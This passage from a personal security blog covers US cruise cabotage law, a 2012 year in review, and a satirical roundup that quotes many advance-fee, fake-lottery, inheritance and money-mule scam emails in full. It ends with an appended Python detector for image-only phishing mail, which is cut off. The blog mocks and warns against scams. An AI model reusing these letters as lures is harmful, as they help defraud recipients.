The Passenger Vessel Services Act of 1886 (sometimes abbreviated to PVSA, Passenger Services Act, or PSA) is a piece of United States legislation which came into force in 1886 relating to cabotage. Essentially, it says:

No foreign vessels shall transport passengers between ports or places in the United States, either directly or by way of a foreign port, under a penalty of $200 (now $300) for each passenger so transported and landed.

This was further bolstered by the Merchant Marine Act of 1920, better known as the “Jones Act”.

The Merchant Marine Act of 1920 (P.L. 66-261) is a United States federal statute that regulates maritime commerce in U.S. waters and between U.S. ports. Section 27, better known as the Jones Act, deals with cabotage (i.e., coastal shipping) and requires that all goods transported by water between U.S. ports be carried in U.S.-flag ships, constructed in the United States, owned by U.S. citizens, and crewed by U.S. citizens and U.S. permanent residents. The purpose of the law is to support the U.S. maritime industry.

So putting this together we get the following (presumably unintended) consequences.

Any vessel subject to the Merchant Marine Act of 1920 counts as a U.S. vessel. Under the Passenger Vessel Services Act of 1886 (46 U.S.C. § 55103), foreign-flagged vessels cannot transport passengers directly between U.S. ports. The handful of U.S.-flagged cruise ships in operation are registered in the U.S. to permit cruises between the Hawaiian Islands, or from the continental U.S. to Hawaii. The Passenger Vessel Services Act, however, does not prohibit foreign-flagged ships departing from and returning to the same U.S. port, or foreign-flagged ships departing from a U.S. port, visiting a foreign port, and then continuing to a second U.S. port. However, in order to embark in a U.S. port and disembark in a second U.S. port, the vessel must visit a distant foreign port outside of North America (Central America, Bermuda, the Bahamas, and all of the Caribbean except Aruba, Bonaire, and Curaçao count as part of North America).

In accordance with this law, cruise lines that operate foreign-flagged vessels are fined $300 for each passenger who boarded such a vessel in one U.S. port and left the vessel at another U.S. port.

There are legal exceptions for medical emergencies, but in spite of how I felt at the time, my 48-hour malady could hardly be considered one. So the bottom line is that the cruise line was prohibited by US law from allowing us to disembark at an intermediate US port.

But wait! This gets better. Since 9/11, Customs and Border Protection (CBP), now a part of the Department of Homeland Security (DHS), has had a strict policy that no one embarks on or disembarks from a foreign-flag vessel in a US port without going through CBP (often referred to as “Customs”). And this is where it gets really interesting. Turns out there is no CBP office in Port Canaveral since no foreign-flag vessels embark or disembark passengers there, and the nearest CBP office is in Orlando, which is 55 miles away. So it’s not too surprising that the CBP folks were not ready to lend assistance immediately. The bottom line is this: there was no legal way for the cruise line to allow us to disembark at Port Canaveral unless we were taken directly to a hospital or were in police custody.

So why didn’t the ship’s guest services crew just tell us this up front? Here’s where the final bit of that foreshadowing of doom comes in: the nature of the passenger maritime industry. You see, the typical crew member on a cruise ship is not American (given that, as far as I can find out, there is exactly one US-flag cruise ship in operation), so they can hardly be expected to be familiar with US maritime law. Also, crew members are not permanently assigned to a ship, and ships are not dedicated to a single cruise route. Since very few cruises that embark from US ports make an intermediate stop at another US port before heading out into international waters, thereby triggering the PVSA and Jones Act restrictions, it’s hardly surprising that no one on the guest services crew during the holiday season had ever heard anything about either the Jones Act or CBP policy. So you can hardly fault the crew members for not having good information.

Finally there’s yet another bit that didn’t figure into this tale but would have had we decided to stop cruising and disembark in the Bahamas per the suggestion of the crew. Since 9/11 DHS has aggressively discouraged airlines from booking short-notice one-way flights into the US. Airlines will not actually refuse to do so, but it will cost a lot. In fact they will suggest that you buy a round-trip ticket, which will cost less, although still expensive, and just forget the return trip. In either case this will pretty much guarantee a strip search and several hours of intimate conversation with TSA officials once you get back into the US.

So what should you take from this cautionary tale? Here’s the list:

  1. If you take a cruise from a US port to anywhere outside the US, be aware that if you get sick or have an emergency that cuts short your cruise it will be a very expensive proposition.
  2. Do not assume that crew members on the cruise ship have any idea how to handle your emergency situation with respect to getting you off of the ship.
  3. If you are forced to cut short your cruise be aware that the cruise line is very limited in what they can do to help you as they too are victims of antique protectionist law and modern security theater.
  4. Since the cruise line is forced into an untenable situation there are no guarantees regarding what they can or will be responsible for. You are on your own to figure this out and know what should happen next.

Fortunately this story does have a happy ending. My vacation wasn’t totally ruined. I got to visit Nassau and bask in the warm Caribbean sun on Coco Cay, so I definitely will be returning to the Bahamas in the future. The cruise line, Royal Caribbean, really made things right. Not only did they waive all medical fees and refund part of the cruise fee for the time I was quarantined, they refunded all of the extra expenses incurred with the failed attempt to leave the ship. So kudos to Royal Caribbean (no, they didn’t spiff me to write this – they just did the right thing). Since I have no other experience, I have no idea what other cruise lines might do in such a situation, but I can definitely recommend Royal Caribbean. Only next time I think I’ll take a cruise not subject to the Jones Act / CBP / DHS perfect storm of cruise hell.

Security For All is four years old (and then some)

Happy Birthday, Happy Birthday, Happy Happy Birthday To You!
I want to do something special for you,
It’s your birthday, and you’re special too.
So I brought some guabs from the outter guab zoo.
They honk (honk) and squak (squak) and sing just for you…
Happy Birthday, Happy Birthday, Happy Happy Birthday To You!
Open your eyes, here’s a present.
More crazy creatures; don’t worry they’re pleasant.
They’re upside down weets on inside out swings,
They do things backwords, and backwords they sing…
Yppah Yadhtrib, Yppah Yadhtrib, Yppah Yppah Yadhtrib Ot Ouy!
From Happy Birthday by Disney

August 2012 marked the fourth anniversary of Security For All. The very first blog post was all about the security theater accompanying the 2008 Democratic National Convention in Denver wherein then-Senator Barack Obama snagged the nomination ultimately culminating in his becoming now-President Barack Obama. So just to keep things symmetric and tidy [I've mentioned before I'm a "circle of life" kind of guy] I had to wait until after election day in November to make sure who was really going to win the Oval Office. Of course by then it was Thanksgiving time and I had to put together the annual Thanks for all the phishing extravaganza. That and I also had to make sure the world really didn’t end with the Mayan Calendar. So that’s my excuse for being 5 months late in getting this out.  And I’m sticking to it.

Regardless of the veracity of my excuses, I typically do a kind of “year in review” for the birthday post so year end 2012 is really more appropriate anyway. Yeah! That’s the ticket. So without further ado, in no particular order or coherency:

I made a big career change moving to Trustwave in January 2012, where I’m now working as a Software Architect. This is actually the real excuse for the lack-luster posting frequency on this web log. These Trustwave folks are brutal taskmasters that expect superhuman effort from me (and everyone else). And I love it.

My son Nick, who pens the Captain X-Ploit sagas, is now a junior at CU studying Integrated Physiology (pre-med). This accounts for the good Captain’s MIA behavior.

The entertainment industry’s “war on piracy” [for the ironically impaired the reference is to the "war on drugs" or "war on terrorism" both abject failures at their stated intents but lucrative financially to the associated industries at the expense of everyone else] was ramped up by calling in some chips from their trained (purchased) politicians resulting in these adventures:

  • Stop Online Piracy Act (SOPA) spawned a “blackout” that became the largest protest in the history of the internet.
  • The US FBI shut down for alleged copyright infringement. This prompted the hacker group Anonymous (those guys with the swell Guy Fawkes masks) to respond by attacking government and entertainment industry websites. Turns out that Kim Dotcom, the New Zealand-based proprietor of may actually end up suing the US government et al. due to some sticky jurisdictional issues. In any case was soon replaced by other sites and any interruption in service was short lived. The “war on piracy” on this front is a lot more like “whack-a-mole” than a real war, and every bit as effective.

Occupy London protesters were evicted from St Paul’s Cathedral. This of course raises the question of whether the Church of England is more concerned with spiritual or corporate interests. I’ll leave it as an exercise for the reader to come to their own conclusion.

2012 was a bad year for Greece. It started out OK with Greece securing a debt-restructuring deal with private lenders in March, but that turned out to be way too little, way too late, and protests in Athens began (again) in earnest following a 77-year-old pensioner’s suicide outside Greece’s parliament in April. By mid April the Prime Minister of Greece, Lucas Papademos, had resigned and called an election for early May, but alas by mid May Greece’s fifth attempt to form a coalition government went pear-shaped and new June elections were scheduled. So once again Greek voters returned to the polls in early June. This time Antonis Samaras, the leader of the New Democracy party in Greece, was able to form a coalition government, and by mid June Greece had proposed to slow down austerity measures by two years. This did not play well in Germany (i.e. the place where the Euro spigot valve is located). By September a new austerity measure was enacted that required Greece to increase its maximum working days to six per week. This did not play well in Greece, where in late September Greek trade unions called a general strike to protest austerity measures, and by mid October tens of thousands were protesting the austerity measures, including 25,000 people in Athens protesting German Chancellor Angela Merkel specifically. By mid November a series of protests against austerity measures occurred across Europe including Spain, Portugal, and of course Greece. Finally in late November the Eurozone announced that it would pay out 43.7 billion euros in loans to Greece. Call me cynical, but I’m not predicting anything other than more protests in 2013 as a result.

Apparently spurred on by the quest for obscene wealth or maybe it was taking the money and running, Mark Zuckerberg decided to take Facebook public. In spite of working up unprecedented buzz surrounding the vaunted and highly anticipated [on Facebook at any rate] Initial Public Offering, the reality was that they had no idea how to pull off such a money grab (er.. IPO). The result was that Facebook’s problematic public listing ended up costing those involved $115 million from technical glitches. The stock turned out to be a bit of an underachiever (read LOSER).

In other legal follies Apple sued Samsung and Samsung sued Apple in a multi-part saga spanning the globe. In late August both Apple and Samsung were found guilty of patent infringement in a South Korean court, while a US jury in California found Samsung guilty of patent infringement and awarded over US$1 billion in damages to Apple, and Apple lost its patent dispute with Samsung in Tokyo, Japan. But wait! There’s more! [in my best late night infomercial voice]. By mid October a US appeals court overturned a district court ruling banning the sale of a Samsung product in the US. So let’s see, by my count the score is now Apple – 0, Samsung – 0 in South Korea, Apple – 1/2, Samsung – 0 in the US, Apple – 0, Samsung – 1 in Japan. So that’s Apple 1/2 to Samsung 1 overall. That seems like a lot of legal money for nothing. I’m just saying…

On a more serious note, 12 people were killed and 59 injured after a gunman opened fire at a movie premiere in Aurora, Colorado, and a few months later 28 people, including 20 children, were shot to death at Sandy Hook Elementary School in Newtown, Connecticut. The saddest part of these tragedies was the predictable reactions of zealots on both sides of the “gun issue”. National Rifle Association (NRA) members went on a buying spree of assault weapons and ammunition, fearing that restrictive new laws would be enacted making it marginally more difficult for them to maintain and expand their arsenals. While on the other side politicians beat their breasts, claimed to feel our pain, and vaguely promised exactly the kind of useless legislation that the gun rights adherents so pathologically detest. The NRA actually proposed training and arming all public school principals, and the great state of Arizona dutifully passed dubious legislation along those lines. Primary school principals with assault rifles – what could possibly go wrong with that? My disgust with political discourse in America grows.

And then there was Hurricane Sandy which became Super Storm Sandy. Here are the bare facts:

October 24 - Hurricane Sandy makes landfall in Jamaica killing 1 person and causing over $50 million in damage
October 25 - Hurricane Sandy makes landfall in Cuba and Haiti killing 65 people and causing over $80 million in damage
October 26 - Hurricane Sandy makes landfall in the Bahamas killing 2 people and causing over $300 million in damage
October 29 - Hurricane Sandy makes landfall in New Jersey resulting in 110 deaths and $50 billion in damage and forces the New York stock exchange to close
October 31 - The New York stock exchange opens after being closed for two days after Hurricane Sandy
November 26 - The cost of Hurricane Sandy to New York is announced to be $32 Billion

The actual story beyond the devastating facts above is that the Jersey shore as we remember it is gone. Forever. All over New York and New Jersey the devastation was unprecedented [my daughter-in-law's uncle's house in Long Island was all over the news because the house across the street literally blew up when a tree uprooted a gas line - the demolished house is in the foreground of the picture]. The lessons here are several:

  1. Our emergency preparedness systems are not ready for a disaster of this scope.
  2. Climate change is happening. Now. We need to quit pretending and start preparing to be resilient.

So stay tuned. Maybe we’ll be a bit more responsible about blogging at Security For All. Or not. But it will probably be pretty funny and borderline informational.

Oh and be sure to actually go to the Security For All blog site and check out our annual swell theme change.

Thanks for all the phishing in 2012
Thanks for the information
Oh never give a sucker an even break
When you’re on to something it’s a
Dime in a dozen people start
Coming out of the woodwork
Thanks for the invitation
I know I must be on to something big
From Thanks for the information by Van Morrison

In 2009, the first year of this blog, in honor of Thanksgiving here in the USA I posted an entry about some things I would have been thankful for in 2009. If they were even remotely true. I’m a collector and, dare I say connoisseur, of Nigerian 419 style phishing messages. Since then it’s become an annual event. So without further ado, here is a sampling of my favorites from 2012. The things I’m thankful for.

I am thankful for someone associated with the Benin Republic who wants to give me $950K (I think) in $5K (or is it $4K) chunks and it will only cost me $50.

RECEIVER NAME:okoye Lawrence

I’m pretty sure I understand that…
OK seriously that pegs the old WTF meter, but hey it’s got to be legit since Mr. Pius is THE NEW MANAGER OF WESTERN UNION. And how can you possibly not trust that security question and answer. This is the hands down winner of the Most Egregious Misuse of Google Translate award in the Found Money category.

I am thankful for all of the US and international government organizations who are dedicated to getting my money back from those nasty Nigerian Miscreants, Hoodlums and Touts.

Office Of The National Security Adviser
Federal Republic Of Nigeria
Aso Rock Villa, Asokoro District,

Based on our investigations,we wish to warn you against some Miscreants, Hoodlums and Touts who go about scamming innocent people by claiming to be who they are not and thereby tarnishing the image of this wonderful country. I am Lt General Peter Olu (Rtd),National Security Adviser to the new Nigerian President Dr Goodluck Ebele Jonathan,(GCON).

I am delighted to inform you that the contract panel which just concluded its seating in Abuja, just released your name among listed beneficiaries to benefit from the Diplomatic Immunity Payment. This Panel was primarily delegated to investigate manipulated inheritance claims, contracts and over-invoiced payment as the effect has eaten deep into the economy of our dear country.

However,we wish to bring to your notice that your contract profile is still reflecting in our central computer as unpaid beneficiary while auditing was going on. Your payment file was forwarded to my office by the auditors as unclaimed fund, we wish to use this medium to inform you that for the time being,the Federal Government of Nigeria have stopped further payment through bank to bank transfer due to beneficiaries numerous petitions to United Nations against Nigeria on wrong payment and diversion of contract/inheritance funds to different accounts.

In this regards, we are going to send your contract part payment of $4.1 Million USD to you via our accredited shipping company and I have secured every needed documents to cover the money while the diplomat will get it delivered to you right in your door step.

Note: The money is coming in 2 security proof boxes. The boxes are sealed with synthetic nylon seal and padded with machine. Please you don’t have to worry for anything as the transaction is 100% risk free.

Best Regards,

Lt General Peter Olu (Rtd).
National Security Adviser to the President
Federal Republic of Nigeria.

And this helpful organization as well.

Good day,
I am Dr. Sofia Hill, I am a US citizen, 48 years Old.  I am one of those that took part in the Compensation in Nigeria many years ago and they refused to pay me, I had paid over $20,000 while in the US, trying to get my payment all to no avail. So I decided to travel over to Nigeria with all my compensation documents, and I was directed to meet Mr. Michael Craig, who is a member of COMPENSATION AWARD COMMITTEE, and I contacted him and he explained everything to me. He said whoever is contacting us through emails are fake. He took me to the paying bank for the claim of my Compensation payment.

Right now  I have received my compensation funds of $1,500,000.00 Moreover, Mr. Michael Craig, showed me the full information of those that are yet to receive their payments and I saw your name as one of the beneficiaries, and your email address, that is why I decided to email you to stop dealing with those people, they are not with your fund, they are only making money out of you.

I will advise you to contact Mr. Michael Craig directly through the below information.

Name: Mr. Michael Craig
E-mail: michaelcraig44@…

You really have to stop dealing with those people that are contacting you and telling you that your fund is with them, it is not in anyway with them, they are only taking advantage of you and they will dry you up until you have nothing. The only money I paid after I met Mr. Michael Craig was just $420 for the paper works, take note of that.

Thank You and Be Blessed.

Dr. Sofia Hill, MD
Childrens Hospital Outpatnt Ctr

Wow! All of these folks falling all over themselves just to help me get satisfaction from those scammers. Although I can’t actually recall being scammed, it was hard to choose which of these individuals was the most trustworthy – Lt General Peter Olu (Rtd), who is ex-military and National Security Adviser to the President (of Nigeria), or Mr. Michael Craig, who comes highly recommended by Dr. Sofia Hill, MD, who was scammed out of $20,000. You can choose which should win in the Help from Nigeria category.

I am thankful for all of the wonderful folks who recognize what an honest, astute investment adviser I am and want to make me rich for assisting them in philanthropic endeavors.

Beloved, Please read this letter carefully.
Don’t be surprise to receive this message; I got your email address from a mail directory. I am Mrs. Joy Armstrong a National of Ivory Coast; I am married to Late Engr. Daniel Armstrong. We were married for 17 years without a child but still waiting upon the lord before my beloved husband`s death in the year 2006.

Since after the death of my late husband, I decided not to re-marry. When my lovely husband was alive, he deposited the sum of US$8 Million (Eight Million United States Dollars) in fixed /suspense account in one of the leading Bank here in Ivory Coast. Presently the bank management contacted me as the next beneficiary because, the initial agreement which my late husband reached with the bank for withdrawal of the fund has expired and due to my critical health am not opportune to apply for the release of the fund to me because, I have a deadly disease called CANCER OF THE LUNGS.

Recently my doctor said my conditions is really deteriorating and is quite obvious that my death is very close because, the CANCER stage is becoming worst. I have been hospitalized for the past 7 months. Base on doctor`s report, am scared because death can come at anytime I now decided to share my feelings and plans with you at this moment in good faith to donate this inherited funds through your great influence and assistant by utilize 70% of the total money to the following like Churches, Orphanages Home, Handicaps, Widows and Widowers, while you keep the remaining 30% for yourself for carrying out my last decision.

Kindly reply me if you can do my wish so I can give you more details on how best the fund will be transfer to you. and will also issue you a letter of authority declaring you as the next of kin or beneficiary to the fund. Please kindly assure me that you will act accordingly and keep all details confidential.

I expect your prompt reply. Thanks and God bless you.

Yours faithfully

Mrs. Joy Armstrong.

And this person who entices me with coy romantic innuendos.

My Dearest,

Good day to you, I know you will be surprise to receive this email, Before I proceed I must first apologize for this unsolicited mail to you, I am aware that this is certainly not a conventional way of approach to establish a relationship of trust, my dear I will like you to understand that, I am writing this mail to you With due respect trust and humanity, I have decided to contact you after much thought considering the fact that we have not meet before, but because of the circumstance oblige me, I decided to contact you due to the urgency of my present situation here in the refugee camp, honestly i am writing this email to you with pains, tears and sorrow from my heart, I am Miss Alice Kipkalya Kones, 25yrs old female and I from Kenya here in Africa; my father was the former Kenyan road Minister. He and Assistant Minister of Home Affairs Lorna Laboso had been on board the Cessna 210, which was headed to Kericho and crashed in a remote area called Kajong’a, in western Kenya. The plane crashed on Tuesday 10th, June, 2008.

After the death of my beloved father my wicked step mother along with my uncles team together and sold everything that my late father had and share the money within themselves. Unfortunately to me I fined my father’s briefcase and when I opened it I found a document, which my late father use to deposit the sum of Nine Million Four Hundred Thousand United State Dollars ($9.400.000.00) in a Bank, here in Burkina Faso West Africa with my name as next of skin, right now I am in Ouagadougou Capital of Burkina Faso to withdraw the money so that i can start a better life and also further my education.

But on my arrival to the Bank, the Bank foreign Operation Department Director whom I meet in person told me that my father instruction to their bank is that the fund would only be release to me when I am married or present a trustee/partner who will help me and invest the fund overseas after the transfer, and the bank ask me to go and look for a foreign partner, that was why I decided to contact you, which I believe that you are going to be honest and reliable person that will help me and stand as my trustee/partner, so that I can present you to the Bank for the release and transfer of the inheritance fund into your bank account in your country, and It is my intention to compensate you with 40% of the total fund for your services and help and the balance shall be my capital in your establishment. As soon as I receive your positive response showing your interest i will put things into action, in the light of the above, I shall appreciate an urgent message indicating your ability and willingness to handle this transaction, awaiting your urgent and positive response, Please do keep this only to your self, i beg you not to disclose it to any body till i come over because am afraid of my wicked stepmother, i will send you my picture in my next email, with due respect, i am pleading that you help me, i am giving all this detailed information with every transparency believing that you will have a clear picture of the base of help i need from you.

I hope to hear from you soon, May truth and love be the guiding word in my refuge,

Best regard,

Yours Sincerely
Alice Kipkalya Kones.

Yet another hard choice to make – do I go for the widow who’s dying of a deadly disease called CANCER OF THE LUNGS but is only offering me 30% of $8 million or the damsel in distress (I’m a sucker for sob stories that involve wicked stepmothers) who implies that I could get not only romance but control of $9.4 million. Again you can choose which should win in the Help with Investments category.

I am thankful for long lost relatives who leave me obscene amounts of money.

Dear Friend,

I am Joseph Onalia, an Attorney by profession from Republic of Togo, Senior Advocate of Togo, (S.A.T).

It might interest you to know that I have a deceased client that bears the same surname with you.

Mr A I.(your last name) came to Togo in 1988 and was working with Shell Development company, Lome Togo.

In 1996 Before his death, I assisted him in making a 15years fixed deposit worth $9.5M which has now Matured to USD$21M payment by the financial institution.

The bank has notified me to provide the next of kin or have the account Confiscated within the next 60 official working days.

I am contacting you for two reasons. Firstly, you both have the same last name, which makes the claim most credible. Secondly, I strongly believe that the financial firm does not deserve to inherit the funds.With your permission, I wish to  proceed to establish you as the next of kin/Beneficiary to my late client.

Do not be afraid as I am his representative attorney and stand the capability to provide all the necessary paperwork to back up this claim until the funds are released to you, We will split.

As it is currently valued at US$21M USD. I intend to split the total US$21M USD with you equaly 50%/50%, after deducting any expenses that comes up during the process of this transaction and thereafter i shall invest my own share in real estate business in your country. Let’s work this out for I have all the documents to prove you as the heir to my deceased client.  If this is against your principles, I do humbly apologize and please do keep very secret.

Kindly get back to me with your;

Full name…………………
Telephone number……………….

I look forward to hearing from you if you are ready to proceed on this transaction.

Best regards,

Barrister  Joseph Onalia
Senior Advocate of Togo, (S.A.T).

Ah yes, good old uncle A I.(your last name), I remember him well before he left for Togo… But that lawyer Joseph Onalia seems a little sleazy – even if he is Senior Advocate of Togo, (S.A.T). I mean taking 50% of my $21 million – after deducting his expenses – seems harsh. I’m not really sure why he needs to know my profession but he’s definitely the winner in the Inheritance category.

I am thankful for uncouth oil companies who want me to assist with business investments.
Although I’m usually wary of crude organizations like Fox Media, this offer is so obtuse that how can it not be legit. This is the clear winner of the Most Egregious Misuse of Google Translate award in the Shady Deals category.

I am thankful for the outrageous prizes I’ve won in various contests I’ve never even entered including WRM Media, Asia Pacific Lottery, YAHOO & WINDOWS LIVE prize, BP Biannual Webmail Sweepstakes, UK National Online Lotto and Yahoo Awards promotion.

Hello Joseph Webster,


Your eMail address was exclusively selected as a possible winner.

Well done – you made it!

You have qualified for the free-choice sweepstake and are therefore amongst the chosen few in the final draw for 3 Apple products: iMac, iPhone, iPad.


Asia Pacific Lottery Organization
80b Phetchamnork Avenue,
Bangkok Thailand.


We write to Congratulate you as regards your Email Address success in our Online Computer Balloting Sweepstakes Program from the Asia Pacific Lottery Organization online draws of 5th Day of the Month held in Bangkok Thailand.

All participants were selected through the Registered Computer Internet Users ballot system drawn from 10,000, Personal Email Addresses & official Email Addresses, from Asia, Australia, New Zealand, Europe, North and South America, Middle East and Africa, as part of our International Promotions Program.

Your Email Address has subsequently won you one of the two Jackpot prizes in the 5th category? You have therefore been approved to claim a Total Sum of USD$368,000.00 (THREE HUNDRED AND SIXTY EIGHT THOUSAND UNITED STATES DOLLARS) Only.

Your Email Address attached to ticket number APLA286067-00-805 with Serial Number ANGR9-3088 that drew the Lucky Numbers of 8641146.

You have therefore been approved of a lump sum payment of USD$368,000.00 (THREE HUNDRED AND SIXTY EIGHT THOUSAND UNITED STATES DOLLARS) Only in cash credited REF NO: ASIAPLOTTOORG00-03803.


British Microsoft Award
Headquarters: Customer service

33 YatchBasinMarina Offices,
UponTyne Newcastle London.


Your email addresses have just won YAHOO & WINDOWS LIVE prize money of GBP£2,000,000.00 (TWO MILLION = GREAT BRITISH POUNDS STERLING) On Friday, 8/3/ 2012. Award winners emerge through random selection of all active email subscribers online. Six are selected monthly to benefit from this promotion.

Payment of Prize and Claim

Winners are to be paid in accordance with his/her SettlementCenter. This promotion was drawn based on email address as the key identification for setting up online accounts. All valid email addresses in the World Wide Web Draw used/participants for the online email promotion version were selected randomly via computer balloting from a global website collaboration with internet companies like eBay, pay pal, liberty reserve, and Google whom also built their systems and based their membership registration identity on email addresses supporting this computer draw system done by extracted email addresses from over 100,000 unions, associations, and corporate bodies  and  affiliated members to the National Lottery website and their advertisers listed online.

these are your identification numbers:
Batch Number: YPB/08/APA-43658
Reference Number:  ZA/YPN/270992008
Award File Security code:  UK/+QU03005

Please note that you’re lucky winning ticket file and number falls within our African booklet representative office in Johannesburg South Africa, as indicated in your ballot played coupon. In view of this, your (£2,000,000.00) would be released to you by our payment department in South Africa


Reference Number: BP12/0117/2012
Batch Number: PBSS102/1414
Dear Sir/Madam,

Winning Notification

The BP Promotions Office hereby notifies you that you are a winner of our Biannual Webmail Sweepstakes Program which took place on the 21st of March 2012 in our head office.

Participants were obtained from a database of one billion email user accounts and no tickets were sold because email addresses were assigned play coupons which were randomly generated using our Quick-Pick Automated E-ballot Software.

You have therefore been approved for the lump sum pay out of £750,000.00(Seven Hundred and Fifty Thousand Pounds Sterling) allocated to Ref No: BP12/0117/2012 because your play coupon bears one of the lucky winning number sequences [21-24-32-43-36-45] Bonus (16). This is from the total promotional budget of £16,000,000.00 (Sixteen Million Pounds Sterling) which is to be shared amongst the winners in this category



Are you the correct owner of this email address? If yes then be Glad this day as the result of the UK National Online Lotto and e-mail address free-ticket draws of The 2012Promotion Award has just been released and we are glad to announce to you that your email address came out in the first category and entitles you to claim the sum of ₤1,850,000.00 {One Million Eight Hundred and fifty Thousand British Pounds, From the UK National ONLINE Lottery Promotion

Your email address was entered for the online draw on this free ticket number: 9DHHDF09373 and won on this Lucky number: UKLO647UZGDJ2.

Please remember you did not enter or buy the ticket to earn you this Prize. It is a Promotional Program to encourage the use of Microsoft and Internet Programs.


Yahoo Awards Center
124 Stockport Road,
Longsight, Manchester M60 2DB – United Kingdom

Dear winner,

This is to inform you that you have won a prize money of Eight Hundred,Twenty Thousand Great Britain Pounds (£820,000,00.)for the month of May, 2012 Prize promotion which is organized by YAHOO AWARDS & WINDOWS LIVE.

YAHOO collects all the email addresses of the people that are active online, among the millions that subscribed to Yahoo and Hotmail and few from other e-mail providers. Six people are selected monthly to benefit from this promotion and you are one of the Selected Winners.

Yep – it’s been a great year for my lottery-winner-without-playing career. Aside from the millions of GREAT BRITISH POUNDS STERLING (apparently that’s the currency of choice for these lotteries – and what’s up with all that collaboration between Microsoft and Yahoo?) I also won some swell Apple products and was even chosen to be on Deal or No Deal. Of course I’m still waiting for my money, iStuff and for Howie to call, but in the meantime these all were winners in the Lottery Winnings category.

I am thankful for all of the offers of thinly veiled money laundering gigs.

Good day.

International Financial company working in the field of medical payments has available vacancy of Account Coordinator in USA.

The main responsibility of this position is to serve payments from our clients in United States.

Requirements :

- Location : USA

- Adult age

- Proven ability to work as part of a team


- Ability to work as home-based employee

- Flexible working schedule

No entrance fees are required.

If you are interested, please send back your resume (CV) with your contact details.

Have a good day.

Strictly speaking these aren’t really phishing attacks. They are real, if not legitimate, job offers. They are, however, related to these phishing scams in that this is how the money is laundered – through bogus financial, travel or shipping companies where all of the Account Coordinators work from home and basically run money through their checking accounts. These solicitations range in veracity from obvious nonsense like this one to really good fake CareerBuilder and Monster notifications. The Money Laundering category contains by far the most messages that I receive.

So there you have it – my list of stuff that I would be thankful for if they were even marginally real.

On a final, more sobering note I received one phishing email that has the dubious honor of being the most chilling and disgusting message I’ve ever received. The background for what makes this message so nasty is this, as described by The Denver Post:

The 10-year-old girl with the gap in her front teeth, who liked to play cheerleader and waitress, giggled a lot, loved the color purple and couldn’t wait to be a teenager, was on her way to school, alone.

She was supposed to meet a friend, a boy her age. The 1,000-foot walk down the street to his home should have taken four minutes, maybe five.

But Jessica Ridgeway, bundled against the cold in a black puffy jacket, never arrived.

The hours and days that followed brought confusion and false leads, moments of hope and dread, leading to the devastating announcement a week after her disappearance that human remains found in a desolate open-space park 9 miles from her home were Jessica’s.

On the afternoon of Oct. 10, maintenance workers were out picking up trash — a routine exercise in a park neighboring a landfill.

Earlier that day, police announced they had ruled out Jessica’s parents as suspects and believed an unknown person abducted her.

At about 2 p.m., workers came across a plastic garbage bag in plain view near a culvert on the side of the road, said Arvada police spokeswoman Jill McGranahan. The bag was heavy and “seemed kind of strange,” she said.

At that moment, animal-management officers who typically chase down stray dogs and escaped livestock drove by.

The maintenance workers flagged them down. An animal-control officer looked inside the bag and saw human remains, McGranahan said. Law enforcement officials have declined to be any more specific than to say they discovered a body that was “not intact.”

Within hours, hundreds of local police and FBI agents descended on the open space to walk the area and look for evidence.

It was 9 miles from Jessica Ridgeway’s house.

Two days later, grim-faced state and local law enforcement officials announced that DNA tests had confirmed that the remains were Jessica’s.

“The focus has changed from the search for Jessica to a mission of justice for Jessica,” said Westminster Police Chief Lee Birk.

“There is a predator at large in our community.”

So against that backdrop – I live about 2 miles from where Jessica was abducted – I receive this email purporting to be from “Neighborhood.Alert” with a subject of “Child Predator Warning”. The email contained only images that linked to some sites where you could “sign up for more information”. Yeah you bet – straight up phishing ploy. Let me close with this friendly warning to the person or group behind that little scam: I will hunt you down and you won’t like it when I find you.
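Detection logic for the kind of message described above, as an added example that is not part of the original post. It parses a constructed email (the sender, subject and URLs are placeholders made up to match the description, not values from any real message) and flags bodies that consist only of linked images with no readable text, which is the tell of this lure. A second constructed sample, an ordinary newsletter with text and an unlinked logo, shows what is not flagged.

```python
"""Flag image-only HTML email whose pictures are all wrapped in links.

Added example, not code from the original post. Both messages below are
constructed samples: the first imitates the shape the author describes
(a "Neighborhood.Alert" mail whose body is nothing but images that link
out to sign-up pages); sender, addresses and URLs are placeholders.
"""
from email import message_from_string
from email.message import Message
from html.parser import HTMLParser


class _LinkImageCounter(HTMLParser):
    """Count visible text, images, and images nested inside <a href> tags."""

    def __init__(self):
        super().__init__()
        self.text_chars = 0
        self.images = 0
        self.linked_images = 0
        self.links = set()
        self._current_href = None  # href of the <a> we are currently inside

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "a":
            self._current_href = attr.get("href")
            if self._current_href:
                self.links.add(self._current_href)
        elif tag == "img":
            self.images += 1
            if self._current_href:
                self.linked_images += 1

    def handle_endtag(self, tag):
        if tag == "a":
            self._current_href = None

    def handle_data(self, data):
        # Only non-whitespace characters count as readable text.
        self.text_chars += len(data.strip())


def html_body(msg: Message) -> str:
    """Return the first text/html part of a parsed message, or ''."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True)
            return raw.decode(part.get_content_charset() or "utf-8", "replace")
    return ""


def analyze(raw_mail: str) -> dict:
    """Summarize the HTML body of a raw RFC 822 message."""
    msg = message_from_string(raw_mail)
    parser = _LinkImageCounter()
    parser.feed(html_body(msg))
    parser.close()
    return {
        "subject": msg.get("Subject", ""),
        "text_chars": parser.text_chars,
        "images": parser.images,
        "linked_images": parser.linked_images,
        "links": sorted(parser.links),
    }


def is_image_only_lure(raw_mail: str, max_text_chars: int = 40) -> bool:
    """True when the body is (almost) text-free and every image is a link.

    The 40-character threshold is an assumption: it tolerates a stray
    footer line or alt text, while a real newsletter has far more text.
    """
    info = analyze(raw_mail)
    return (
        info["images"] > 0
        and info["linked_images"] == info["images"]
        and info["text_chars"] <= max_text_chars
        and len(info["links"]) > 0
    )


# Constructed sample 1: image-only lure, every image is a click-through link.
LURE = """\
From: Neighborhood.Alert <alerts@example.invalid>
To: recipient@example.invalid
Subject: Child Predator Warning
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="http://example.invalid/more-info"><img src="cid:banner" width="600"></a>
<a href="http://example.invalid/sign-up"><img src="cid:map" width="600"></a>
</body></html>
"""

# Constructed sample 2: ordinary newsletter with real text and an unlinked logo.
NEWSLETTER = """\
From: City Library <news@example.invalid>
To: recipient@example.invalid
Subject: October events at the library
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<img src="cid:logo" alt="City Library">
<p>Join us Saturday at 10am for the fall book sale in the main hall.
Children's story hour continues every Tuesday at 4pm.</p>
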